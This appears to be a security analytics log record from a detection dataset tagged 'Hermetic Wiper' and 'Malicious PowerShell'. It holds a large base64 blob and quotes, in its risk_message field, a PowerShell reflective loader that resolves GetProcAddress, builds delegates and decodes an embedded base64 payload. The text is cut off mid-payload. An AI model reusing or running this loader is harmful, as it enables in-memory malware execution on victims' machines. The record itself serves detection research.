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", UserID="'S-1-5-18'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T12:11:41", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T12:11:41", risk_message="A suspicious powershell script contains reflective class assembly command in Set-StrictMode -Version 2 $DoIt = @' function func_get_proc_address { Param ($var_module, $var_procedure) $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) } function func_get_delegate_type { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, [Parameter(Position = 1)] [Type] $var_return_type = [Void] ) $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed') return $var_type_builder.CreateType() } [Byte[]]$var_code = [System.Convert]::FromBase64String('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